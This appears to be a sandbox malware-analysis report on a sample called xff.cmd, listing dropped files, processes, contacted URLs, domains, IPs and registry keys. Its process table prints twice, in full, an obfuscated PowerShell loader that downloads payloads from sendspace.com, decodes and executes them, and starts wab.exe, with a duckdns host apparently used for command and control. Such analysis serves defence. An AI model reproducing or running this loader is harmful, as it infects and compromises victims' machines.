Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
xff.cmd
|
ASCII text, with very long lines (6864), with no line terminators
|
initial sample
|
 |
|
|
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_wab.exe_c37a4ff6c8a4ed9385ea8057619eae3fd5c96a_41d3b116_cdb68d28-d70a-498a-b55d-9a153f3a7274\Report.wer
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WERF2D5.tmp.dmp
|
Mini DuMP crash report, 14 streams, Thu May 23 19:11:05 2024, 0x1205a4 type
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WERF4AB.tmp.WERInternalMetadata.xml
|
XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WERF50A.tmp.xml
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l5ts54qn.5vy.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nvwr4l2v.4ib.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rjn53r1n.xt2.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zhtjio2f.13m.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\K1LU13OLD73QY1LDC9QS.temp
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Tider.Dre
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
||
|
C:\Windows\appcompat\Programs\Amcache.hve
|
MS Windows registry file, NT/2000 or above
|
dropped
|
There are 5 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\xff.cmd" "
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell.exe -windowstyle hidden "$Shave = 1;$Stikningens='Sub';$Stikningens+='strin';$Stikningens+='g';Function Sideblikkets($Missel){$Wandoo=$Missel.Length-$Shave;For($Unisexuality=5;$Unisexuality
-lt $Wandoo;$Unisexuality+=6){$Berseems+=$Missel.$Stikningens.Invoke( $Unisexuality, $Shave);}$Berseems;}function Mekhitarist($Starchflower){&
($Plukningernes) ($Starchflower);}$Skolekommissionerne=Sideblikkets 'kedelMSepteoAk dezHund.iLivsflAesculBloksaCo ds/ Call5pred,.Tizwi0Liebh
P ery(MaalbW.ormaiReklanSonnedNdst.oUneffwNonadsBen.i Obs rNSt.anTApert D cum1Zolao0Sel.k.Raad 0Impen;Blodh N,nclW.aldyiT
lelnDagui6Midal4Cicer;genne S.llex ype6 C,ys4 Ord ;Paras ,attr Seigv Trem:a pro1 Dubh2Varme1 Glan.Skand0 Cucu)skatt F adrGUndere
OuttcP,litkLandooAspa / Benb2 Genf0Outfi1Crim.0Af.an0Amphi1Warri0Theca1 Komm BosomFUrovaiFar,brBoateeVoco.fAralkoFacadxFysio/
Jess1marke2Ta.sh1Miili. Rang0Store ';$Forvaltningsmyndigheden=Sideblikkets 'Eksp USkr,bslucinePrel,rSkakt-YoghuAP pelgFilt.e
haln Endet aks, ';$Disgustful=Sideblikkets ' hedhOverntrothet Ind.p DeacsBlued:Speac/U,clo/ TraswPseudwDaanewProca.Dissis
Ras.eStjernPrededRednisTemaspD.fraaIndrec Helle A st.Acentcthorao draem Fed,/Statip,illbrnrbeso A.oc/ExactdBistnl Club/Postuo
utscwNiger9fuldf1Stoic4Bisto8Bikag ';$Fangstkvotaer=Sideblikkets 're te> Laur ';$Plukningernes=Sideblikkets 'Sa,spiTapiseHell.xkomma
';$Fertilizables='Indkapslingerne140';$Koden = Sideblikkets ' P gleDtsilc.msvbh S eeo Ex.u digit%Supe,alevi p .erjpStrumdBe
ikaStridtDat.taStand%Prokl\BoligTUlykki ForydFaxeheStor,rKokko. P,stDSaturrSoutre over S,ilo&Desig&Rang Kon re Ty.ec ModehSupinoFre
e NadintLindi ';Mekhitarist (Sideblikkets 'Machi$ParengFrokolNage oBes.obFormuaKommul Syll:AktioMCloseiForfrsBrig tDonkeeSteg,rGaleo=Falsi(Gan.hcMislam,elatd
Trid Busse/,iscocKomme nonsu$UnchaK PileoDoigtdYojane DistnTripl),rrit ');Mekhitarist (Sideblikkets 'Adres$nonbrg TilslStillo
TongbHavneaHerrelProle:PinctDFaseraV,sicgIn,ulu haboe LapnrradiorLae,eeJalteoTubert DrifySandwp,nfori LeareStalkn,pildsProbl=Trekv$ZoogeD
UmbriF,ftes InspgFlaxwuNon,psMuscatBo,caf dumpuF.renlOrnit.Ra.posPreprpS riel P.opiJerbot Nece(Cauli$Micr,FUnpr.aFr,ngnL,berg
Af,us ungst Sk,lk Sph.vSte eoHaanltS,antaKrepeeRyaerrFo,mu),ehan ');$Disgustful=$Daguerreotypiens[0];$Unsingularness= (Sideblikkets
'Dugou$ rosegGreenlPr.yeoCoxswb Nesha HofmlNonbu: Bjf.BKoordesubs,b L.mpu UnkndS.ggeeNyserrBe.senEm greEvn,nsMinds=flaadNHjerte
UnslwDoubt- WhitORonkebfunktj,enopeSpo.vcDokumtHym n tilgS FantySmagls yruptFougueKlampmTottl.sondeNDecigeK jsetpaleb.ChlamWFla,keThronbKrofoCPuls,lgordiiglauceBehovnTandbt');$Unsingularness+=$Mister[1];Mekhitarist
($Unsingularness);Mekhitarist (Sideblikkets 'Neg,e$RadioB,ndule HjembIntrauS.cerdNonpeeKabelrBrugen T,leeunhe.sCeteo. ,omiH
RegneSk rpaHelvedGa ewe UdstrSupersBomae[Bletr$sandsFSlaveoDummerVentovBr ebakalfalSkulktAbsolnDesilif,rhanSopragAktiesKl
mam Mic.yPe,ronIndi d P,gui fy.ig ,avnhPals,eSkaded Ich.eDaudinKonsu]Wor,h=malap$.emasSTnneskschoooBu,ealSporteHydrak rozeoMa
esmOrl,gmNaplei Pa ksAt,rissaucei Rea oSamfunDeprieNo purOpsprnPreceeKlang ');$Bortfjernelsernes=Sideblikkets 'Frems$PensiBLivvaeSa,rabUoveruAlexadAfreteAlimerBjrndnU.odieSvmmes
iala.Is.spDForfroBortvw KoolnServilEntreoTelefa,uperdFantoFWillyiSemisl,eroleEng.n(Minid$VelgeDHoldoiTurf s.imssgK shkuEpiscs
,esktIndfdfHealtu AarelCoyot, Bomb$ ProdRAgg.eePostulTydnia Imprt NajaiSpir,v nmarp.ignar TricoLu acn S shoparthmSu areTilban
ZincePassir frgenErudieSogne) Akkr ';$Relativpronomenerne=$Mister[0];Mekhitarist (Sideblikkets 'Unrig$KoopegMelanl S,dboDanmabFiskeaSyndflCurcu:DejkrV
nobeaTransl Speae B rtr Un,giAer.taHaw nn AfhraCitedtKn.aseVarie=Sha,f(overtTMa.neeFedtesDyrevtK.nsp-familPCoenzaBlgeft P.eehSemit
Sej s$ XiphR DavyeGrowsl.ntriadecret Herlia ousvdip op Tegnr.etsbo Be en Skalo SagkmCottoe Elefn KonseEdriar Me.knBaubeeTopno)
Tefe ');while (!$Valerianate) {Mekhitarist (Sideblikkets 'Mondr$ DuctgPulisl remgoFo,elbForfoaInf.rlCellm: orchLlufteoHensllKnsroi
DetauAguismStn n=Modif$Derm,tSentar ejenuSh,uce.rein ') ;Mekhitarist $Bortfjernelsernes;Mekhitarist (Sideblikkets 'StridSFre.ntInhauaDisd.rPaleot
Demi-OversSForsklGenneeTickleSla tp,riva B anc4Sub,r ');Mekhitarist (Sideblikkets 'mu.pi$Genneg,haprl M,tooImmunb AmylaGarvll
Sti :MasseVPote.aMad elFordreTommyrBlid,iChalcaSt ejnHyleraTalertpho oe Unco=Visko(BecloTForuneVampisHj rnt Igno-DatisPMindeaCharlt
emilhRejsh Tildi$HystrRJosepeT,aumlUdkigaNemictSammeiTangfvrekompInterrExtraoFla.bnGeneroSamstmAnapheFrekvnSy doeCap.irTu.slnRottee
Gast)Acido ') ;Mekhitarist (Sideblikkets ' Ofr.$SudatgPiro lFucoxoyver,bCl.staSkovflNone,:ColliHSombruam itgDrbeloUfornrBeridmOve,penontrbNuncgiun
urdEnsom=Attr $MoplagMandil PicroStvb,bFiltraLi.uelMine.:RheinN MaalaSpondeParreg.ickeaAerodiFoin tJewel+Fa.se+Tirre% Tarv$ProcoDdigekaD,nebg
O eruSupereRe.harAwakerKursneIllegoFolketI lomyacutip Tro iHoroueMor.in Bisms Repr.Erhvec DismoUniveu Persn ambrtsilic ')
;$Disgustful=$Daguerreotypiens[$Hugormebid];}$Uncoincident=320251;$Vasiferous=29255;Mekhitarist (Sideblikkets 'Amphi$tryl
g GlislRykkeoshallbPyromaAcrosl ,oui:Kumm.gPremuaOejnelHelgevforn aDi,cinCrippoFormit TaleaAggrecSplint unicijodl.c Ove. Taell=Ukamp
TildaGTrompeChequtFrogg- ofllC InhaoPrebanKl,nktFrsteeSubminSaddltBlok. Wahim$ FlodRCoodle RikolPol,pa TvebtBliveigruppv Dyrep
slamrUdvekoIteminTro.boOakykmChicaeSpecin TugteAppl,rBast.nAlloeeProvo ');Mekhitarist (Sideblikkets 'Bantu$TilingJocunlAnthro
Mu kb udv.a KimblEncy :UdbydCTransoSab.enHomagv ShinoBaldulSmeltvRideeuChirol AnaluA,utisObli.e AxilsTrele6 Spid2Fo,la Reasc=Tortu
Sekle[ PinaSHoiseyA,falsPyntetFu nee F.rhmV,cef.IndenCAryepoVi sen HavavBrneae Opfyr luertNonau]Grout:Udlic:B,rkeF kinrs
ltyo FyrtmFa.veBMagniadyrtisTaurie Chon6 Natu4Che,aSKonjetkluntrE.bedi Plagn ortg Linj(aabne$VitelgTimefa undelStyrmvA.beja.ogren
.issoHellit,ebetaLyv.ncM,wkitTiptiil tercCemen) M rq ');Mekhitarist (Sideblikkets 'Frank$Ac,uigOntoglOsculoReelab S lpaUnimpl
anti: BrisV vantaSkrivl Tal m,xheauSaveneSu ornOrlan mili=Vintn Malo.[digreS SoppyEnkelsDefi.tTentie WheamPreco.SeksuTPi.ete
krivxNavletTalel.TilsmE Minin AlkechovedoDism,d rskoiElencnZygodgUnsca]Gri,g:Gaull:JenhuA ForhSP insCFo.egIkd ndIGenga.,hitfG
remteGenertBrndsS KomptLech rAlkaiiKadjanSnabeg Foto( Swip$Nu,woC.laneoHail.nSlikpvLusk oTrolll,trudvBjer,uTaplilSysteuFremrsSnogeeLoka,sInter6Misch2Remrk)Multi
');Mekhitarist (Sideblikkets 'Supe.$Be.aegUnusalCh.kkoSelvobHypnoaGy nolRadic:Tokr,BOver oMah gtKleastAzod,oRhythmHeterlFossieAbbots
SyllsDamagnHalakePermusAandes Tibe=Opdal$Dyr mVBroaca,oubllBage m El,kuSemiveGrandnHi le.Aut,ts Ka ruNonfobAerolsMemortSy,edrPeabei
VejsnNeepags,lvf(Utilb$InterURottinIncapcSkurkoK.rrei ArthnGilenc MacriG nebd Snu el.quanTunfitAdopt,Flane$CoevaVPrer,aSvangs
TrusiRidgef UdsoeSha lrso,thoAlemauPre asDesta)Kursn ');Mekhitarist $Bottomlessness;"
|
|
|
|
C:\Windows\System32\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Tider.Dre && echo t"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Shave = 1;$Stikningens='Sub';$Stikningens+='strin';$Stikningens+='g';Function
Sideblikkets($Missel){$Wandoo=$Missel.Length-$Shave;For($Unisexuality=5;$Unisexuality -lt $Wandoo;$Unisexuality+=6){$Berseems+=$Missel.$Stikningens.Invoke(
$Unisexuality, $Shave);}$Berseems;}function Mekhitarist($Starchflower){& ($Plukningernes) ($Starchflower);}$Skolekommissionerne=Sideblikkets
'kedelMSepteoAk dezHund.iLivsflAesculBloksaCo ds/ Call5pred,.Tizwi0Liebh P ery(MaalbW.ormaiReklanSonnedNdst.oUneffwNonadsBen.i
Obs rNSt.anTApert D cum1Zolao0Sel.k.Raad 0Impen;Blodh N,nclW.aldyiT lelnDagui6Midal4Cicer;genne S.llex ype6 C,ys4 Ord ;Paras
,attr Seigv Trem:a pro1 Dubh2Varme1 Glan.Skand0 Cucu)skatt F adrGUndere OuttcP,litkLandooAspa / Benb2 Genf0Outfi1Crim.0Af.an0Amphi1Warri0Theca1
Komm BosomFUrovaiFar,brBoateeVoco.fAralkoFacadxFysio/ Jess1marke2Ta.sh1Miili. Rang0Store ';$Forvaltningsmyndigheden=Sideblikkets
'Eksp USkr,bslucinePrel,rSkakt-YoghuAP pelgFilt.e haln Endet aks, ';$Disgustful=Sideblikkets ' hedhOverntrothet Ind.p DeacsBlued:Speac/U,clo/
TraswPseudwDaanewProca.Dissis Ras.eStjernPrededRednisTemaspD.fraaIndrec Helle A st.Acentcthorao draem Fed,/Statip,illbrnrbeso
A.oc/ExactdBistnl Club/Postuo utscwNiger9fuldf1Stoic4Bisto8Bikag ';$Fangstkvotaer=Sideblikkets 're te> Laur ';$Plukningernes=Sideblikkets
'Sa,spiTapiseHell.xkomma ';$Fertilizables='Indkapslingerne140';$Koden = Sideblikkets ' P gleDtsilc.msvbh S eeo Ex.u digit%Supe,alevi
p .erjpStrumdBe ikaStridtDat.taStand%Prokl\BoligTUlykki ForydFaxeheStor,rKokko. P,stDSaturrSoutre over S,ilo&Desig&Rang Kon
re Ty.ec ModehSupinoFre e NadintLindi ';Mekhitarist (Sideblikkets 'Machi$ParengFrokolNage oBes.obFormuaKommul Syll:AktioMCloseiForfrsBrig
tDonkeeSteg,rGaleo=Falsi(Gan.hcMislam,elatd Trid Busse/,iscocKomme nonsu$UnchaK PileoDoigtdYojane DistnTripl),rrit ');Mekhitarist
(Sideblikkets 'Adres$nonbrg TilslStillo TongbHavneaHerrelProle:PinctDFaseraV,sicgIn,ulu haboe LapnrradiorLae,eeJalteoTubert
DrifySandwp,nfori LeareStalkn,pildsProbl=Trekv$ZoogeD UmbriF,ftes InspgFlaxwuNon,psMuscatBo,caf dumpuF.renlOrnit.Ra.posPreprpS
riel P.opiJerbot Nece(Cauli$Micr,FUnpr.aFr,ngnL,berg Af,us ungst Sk,lk Sph.vSte eoHaanltS,antaKrepeeRyaerrFo,mu),ehan ');$Disgustful=$Daguerreotypiens[0];$Unsingularness=
(Sideblikkets 'Dugou$ rosegGreenlPr.yeoCoxswb Nesha HofmlNonbu: Bjf.BKoordesubs,b L.mpu UnkndS.ggeeNyserrBe.senEm greEvn,nsMinds=flaadNHjerte
UnslwDoubt- WhitORonkebfunktj,enopeSpo.vcDokumtHym n tilgS FantySmagls yruptFougueKlampmTottl.sondeNDecigeK jsetpaleb.ChlamWFla,keThronbKrofoCPuls,lgordiiglauceBehovnTandbt');$Unsingularness+=$Mister[1];Mekhitarist
($Unsingularness);Mekhitarist (Sideblikkets 'Neg,e$RadioB,ndule HjembIntrauS.cerdNonpeeKabelrBrugen T,leeunhe.sCeteo. ,omiH
RegneSk rpaHelvedGa ewe UdstrSupersBomae[Bletr$sandsFSlaveoDummerVentovBr ebakalfalSkulktAbsolnDesilif,rhanSopragAktiesKl
mam Mic.yPe,ronIndi d P,gui fy.ig ,avnhPals,eSkaded Ich.eDaudinKonsu]Wor,h=malap$.emasSTnneskschoooBu,ealSporteHydrak rozeoMa
esmOrl,gmNaplei Pa ksAt,rissaucei Rea oSamfunDeprieNo purOpsprnPreceeKlang ');$Bortfjernelsernes=Sideblikkets 'Frems$PensiBLivvaeSa,rabUoveruAlexadAfreteAlimerBjrndnU.odieSvmmes
iala.Is.spDForfroBortvw KoolnServilEntreoTelefa,uperdFantoFWillyiSemisl,eroleEng.n(Minid$VelgeDHoldoiTurf s.imssgK shkuEpiscs
,esktIndfdfHealtu AarelCoyot, Bomb$ ProdRAgg.eePostulTydnia Imprt NajaiSpir,v nmarp.ignar TricoLu acn S shoparthmSu areTilban
ZincePassir frgenErudieSogne) Akkr ';$Relativpronomenerne=$Mister[0];Mekhitarist (Sideblikkets 'Unrig$KoopegMelanl S,dboDanmabFiskeaSyndflCurcu:DejkrV
nobeaTransl Speae B rtr Un,giAer.taHaw nn AfhraCitedtKn.aseVarie=Sha,f(overtTMa.neeFedtesDyrevtK.nsp-familPCoenzaBlgeft P.eehSemit
Sej s$ XiphR DavyeGrowsl.ntriadecret Herlia ousvdip op Tegnr.etsbo Be en Skalo SagkmCottoe Elefn KonseEdriar Me.knBaubeeTopno)
Tefe ');while (!$Valerianate) {Mekhitarist (Sideblikkets 'Mondr$ DuctgPulisl remgoFo,elbForfoaInf.rlCellm: orchLlufteoHensllKnsroi
DetauAguismStn n=Modif$Derm,tSentar ejenuSh,uce.rein ') ;Mekhitarist $Bortfjernelsernes;Mekhitarist (Sideblikkets 'StridSFre.ntInhauaDisd.rPaleot
Demi-OversSForsklGenneeTickleSla tp,riva B anc4Sub,r ');Mekhitarist (Sideblikkets 'mu.pi$Genneg,haprl M,tooImmunb AmylaGarvll
Sti :MasseVPote.aMad elFordreTommyrBlid,iChalcaSt ejnHyleraTalertpho oe Unco=Visko(BecloTForuneVampisHj rnt Igno-DatisPMindeaCharlt
emilhRejsh Tildi$HystrRJosepeT,aumlUdkigaNemictSammeiTangfvrekompInterrExtraoFla.bnGeneroSamstmAnapheFrekvnSy doeCap.irTu.slnRottee
Gast)Acido ') ;Mekhitarist (Sideblikkets ' Ofr.$SudatgPiro lFucoxoyver,bCl.staSkovflNone,:ColliHSombruam itgDrbeloUfornrBeridmOve,penontrbNuncgiun
urdEnsom=Attr $MoplagMandil PicroStvb,bFiltraLi.uelMine.:RheinN MaalaSpondeParreg.ickeaAerodiFoin tJewel+Fa.se+Tirre% Tarv$ProcoDdigekaD,nebg
O eruSupereRe.harAwakerKursneIllegoFolketI lomyacutip Tro iHoroueMor.in Bisms Repr.Erhvec DismoUniveu Persn ambrtsilic ')
;$Disgustful=$Daguerreotypiens[$Hugormebid];}$Uncoincident=320251;$Vasiferous=29255;Mekhitarist (Sideblikkets 'Amphi$tryl
g GlislRykkeoshallbPyromaAcrosl ,oui:Kumm.gPremuaOejnelHelgevforn aDi,cinCrippoFormit TaleaAggrecSplint unicijodl.c Ove. Taell=Ukamp
TildaGTrompeChequtFrogg- ofllC InhaoPrebanKl,nktFrsteeSubminSaddltBlok. Wahim$ FlodRCoodle RikolPol,pa TvebtBliveigruppv Dyrep
slamrUdvekoIteminTro.boOakykmChicaeSpecin TugteAppl,rBast.nAlloeeProvo ');Mekhitarist (Sideblikkets 'Bantu$TilingJocunlAnthro
Mu kb udv.a KimblEncy :UdbydCTransoSab.enHomagv ShinoBaldulSmeltvRideeuChirol AnaluA,utisObli.e AxilsTrele6 Spid2Fo,la Reasc=Tortu
Sekle[ PinaSHoiseyA,falsPyntetFu nee F.rhmV,cef.IndenCAryepoVi sen HavavBrneae Opfyr luertNonau]Grout:Udlic:B,rkeF kinrs
ltyo FyrtmFa.veBMagniadyrtisTaurie Chon6 Natu4Che,aSKonjetkluntrE.bedi Plagn ortg Linj(aabne$VitelgTimefa undelStyrmvA.beja.ogren
.issoHellit,ebetaLyv.ncM,wkitTiptiil tercCemen) M rq ');Mekhitarist (Sideblikkets 'Frank$Ac,uigOntoglOsculoReelab S lpaUnimpl
anti: BrisV vantaSkrivl Tal m,xheauSaveneSu ornOrlan mili=Vintn Malo.[digreS SoppyEnkelsDefi.tTentie WheamPreco.SeksuTPi.ete
krivxNavletTalel.TilsmE Minin AlkechovedoDism,d rskoiElencnZygodgUnsca]Gri,g:Gaull:JenhuA ForhSP insCFo.egIkd ndIGenga.,hitfG
remteGenertBrndsS KomptLech rAlkaiiKadjanSnabeg Foto( Swip$Nu,woC.laneoHail.nSlikpvLusk oTrolll,trudvBjer,uTaplilSysteuFremrsSnogeeLoka,sInter6Misch2Remrk)Multi
');Mekhitarist (Sideblikkets 'Supe.$Be.aegUnusalCh.kkoSelvobHypnoaGy nolRadic:Tokr,BOver oMah gtKleastAzod,oRhythmHeterlFossieAbbots
SyllsDamagnHalakePermusAandes Tibe=Opdal$Dyr mVBroaca,oubllBage m El,kuSemiveGrandnHi le.Aut,ts Ka ruNonfobAerolsMemortSy,edrPeabei
VejsnNeepags,lvf(Utilb$InterURottinIncapcSkurkoK.rrei ArthnGilenc MacriG nebd Snu el.quanTunfitAdopt,Flane$CoevaVPrer,aSvangs
TrusiRidgef UdsoeSha lrso,thoAlemauPre asDesta)Kursn ');Mekhitarist $Bottomlessness;"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe"
|
|
|
|
C:\Windows\SysWOW64\WerFault.exe
|
C:\Windows\SysWOW64\WerFault.exe -u -p 8172 -s 2772
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Tider.Dre && echo t"
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
|
|
|
nmds.duckdns.org
|
|
||
|
https://www.sendspace.com/pro/dl/ougyql
|
104.21.28.80
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://fs03n4.sendspace.com/yK
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://fs03n4.sendspace.com/dlpro/b38ae3db991f0ad99006fe4234117e3b/664f9440/ougyql/mvQWivKaVtxblG80
|
unknown
|
||
|
http://www.microsoft.co
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://fs13n3.sendspace.com/dlpro/3f6d43e0acc954908c31e25fcf4bf945/664f9418/ow9148/Supervene.pfb
|
69.31.136.57
|
||
|
http://upx.sf.net
|
unknown
|
||
|
https://fs03n4.sendspace.com/dlpro/b38ae3db991f0ad99006fe4234117e3b/664f9440/ougyql/mvQWivKaVtxblG80.bin
|
69.31.136.17
|
||
|
http://www.sendspace.com
|
unknown
|
||
|
https://fs03n4.sendspace.com/
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://www.sendspace.com
|
unknown
|
||
|
https://www.sendspace.com/
|
unknown
|
||
|
https://aka.ms/pscore6lB
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://fs03n4.sendspace.com/A
|
unknown
|
||
|
https://www.sendspace.com/pro/dl/ow9148P
|
unknown
|
||
|
http://fs13n3.sendspace.com
|
unknown
|
||
|
https://fs13n3.sendspace.com
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
https://www.sendspace.com/pro/dl/ow9148
|
104.21.28.80
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
There are 19 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
nmds.duckdns.org
|
12.202.180.134
|
|
|
|
fs03n4.sendspace.com
|
69.31.136.17
|
||
|
fs13n3.sendspace.com
|
69.31.136.57
|
||
|
www.sendspace.com
|
104.21.28.80
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
12.202.180.134
|
nmds.duckdns.org
|
United States
|
|
|
|
69.31.136.17
|
fs03n4.sendspace.com
|
United States
|
||
|
104.21.28.80
|
www.sendspace.com
|
United States
|
||
|
69.31.136.57
|
fs13n3.sendspace.com
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
\REGISTRY\A\{e0632533-d5e4-8a06-64b5-60d72c1347e0}\Root\InventoryApplicationFile\wab.exe|a27e0f9c88d3b3b0
|
ProgramId
|
||
|
\REGISTRY\A\{e0632533-d5e4-8a06-64b5-60d72c1347e0}\Root\InventoryApplicationFile\wab.exe|a27e0f9c88d3b3b0
|
FileId
|
||
|
\REGISTRY\A\{e0632533-d5e4-8a06-64b5-60d72c1347e0}\Root\InventoryApplicationFile\wab.exe|a27e0f9c88d3b3b0
|
LowerCaseLongPath
|
||
|
\REGISTRY\A\{e0632533-d5e4-8a06-64b5-60d72c1347e0}\Root\InventoryApplicationFile\wab.exe|a27e0f9c88d3b3b0
|
LongPathHash
|
||
|
\REGISTRY\A\{e0632533-d5e4-8a06-64b5-60d72c1347e0}\Root\InventoryApplicationFile\wab.exe|a27e0f9c88d3b3b0
|
Name
|
||
|
\REGISTRY\A\{e0632533-d5e4-8a06-64b5-60d72c1347e0}\Root\InventoryApplicationFile\wab.exe|a27e0f9c88d3b3b0
|
OriginalFileName
|
||
|
\REGISTRY\A\{e0632533-d5e4-8a06-64b5-60d72c1347e0}\Root\InventoryApplicationFile\wab.exe|a27e0f9c88d3b3b0
|
Publisher
|
||
|
\REGISTRY\A\{e0632533-d5e4-8a06-64b5-60d72c1347e0}\Root\InventoryApplicationFile\wab.exe|a27e0f9c88d3b3b0
|
Version
|
||
|
\REGISTRY\A\{e0632533-d5e4-8a06-64b5-60d72c1347e0}\Root\InventoryApplicationFile\wab.exe|a27e0f9c88d3b3b0
|
BinFileVersion
|
||
|
\REGISTRY\A\{e0632533-d5e4-8a06-64b5-60d72c1347e0}\Root\InventoryApplicationFile\wab.exe|a27e0f9c88d3b3b0
|
BinaryType
|
||
|
\REGISTRY\A\{e0632533-d5e4-8a06-64b5-60d72c1347e0}\Root\InventoryApplicationFile\wab.exe|a27e0f9c88d3b3b0
|
ProductName
|
||
|
\REGISTRY\A\{e0632533-d5e4-8a06-64b5-60d72c1347e0}\Root\InventoryApplicationFile\wab.exe|a27e0f9c88d3b3b0
|
ProductVersion
|
||
|
\REGISTRY\A\{e0632533-d5e4-8a06-64b5-60d72c1347e0}\Root\InventoryApplicationFile\wab.exe|a27e0f9c88d3b3b0
|
LinkDate
|
||
|
\REGISTRY\A\{e0632533-d5e4-8a06-64b5-60d72c1347e0}\Root\InventoryApplicationFile\wab.exe|a27e0f9c88d3b3b0
|
BinProductVersion
|
||
|
\REGISTRY\A\{e0632533-d5e4-8a06-64b5-60d72c1347e0}\Root\InventoryApplicationFile\wab.exe|a27e0f9c88d3b3b0
|
AppxPackageFullName
|
||
|
\REGISTRY\A\{e0632533-d5e4-8a06-64b5-60d72c1347e0}\Root\InventoryApplicationFile\wab.exe|a27e0f9c88d3b3b0
|
AppxPackageRelativeId
|
||
|
\REGISTRY\A\{e0632533-d5e4-8a06-64b5-60d72c1347e0}\Root\InventoryApplicationFile\wab.exe|a27e0f9c88d3b3b0
|
Size
|
||
|
\REGISTRY\A\{e0632533-d5e4-8a06-64b5-60d72c1347e0}\Root\InventoryApplicationFile\wab.exe|a27e0f9c88d3b3b0
|
Language
|
||
|
\REGISTRY\A\{e0632533-d5e4-8a06-64b5-60d72c1347e0}\Root\InventoryApplicationFile\wab.exe|a27e0f9c88d3b3b0
|
IsOsComponent
|
||
|
